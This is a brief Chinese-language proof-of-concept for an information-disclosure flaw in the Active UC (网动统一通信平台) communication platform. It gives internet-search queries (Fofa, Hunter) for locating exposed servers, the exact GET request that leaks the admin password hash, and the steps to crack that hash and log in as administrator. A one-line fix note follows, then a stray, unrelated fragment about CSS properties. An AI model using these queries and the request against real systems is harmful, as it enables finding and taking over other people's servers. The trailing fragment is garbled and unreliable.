0x01 产品描述:
网动统一通信平台(Active UC)是一款综合性的通信平台,涵盖了文字、语音、视频通讯等功能,旨在提升用户的沟通效率和便利性,提供一个统一的通信环境。 该平台支持多种通信设备和协议,具有高度的兼容性和灵活性,能够适应不同的网络环境和工作需求。
0x02 漏洞描述:
网动统一通信平台是采用统一的通信界面,将VoIP电话系统、电子邮件等多种沟通方式融合的企业IT平台,接口 /acenter/iactiveEnterMeeting.action?roomid=1&username=admin 存在信息泄露漏洞,可能导致管理员密码泄露获取后台权限等
0x03 搜索语句:
Fofa:title="网动统一通信平台(Active UC)"
Hunter:web.title=="网动统一通信平台(Active UC)"
0x04 漏洞复现:
GET /acenter/iactiveEnterMeeting.action?roomid=1&username=admin HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 
对返回的md5进行碰撞
使用获取的用户名/密码进行登录
0x05 修复建议:
接口加上权限校验,响应消息不过度反回。
(font、height、left、letter-spacing、line-height 属性))
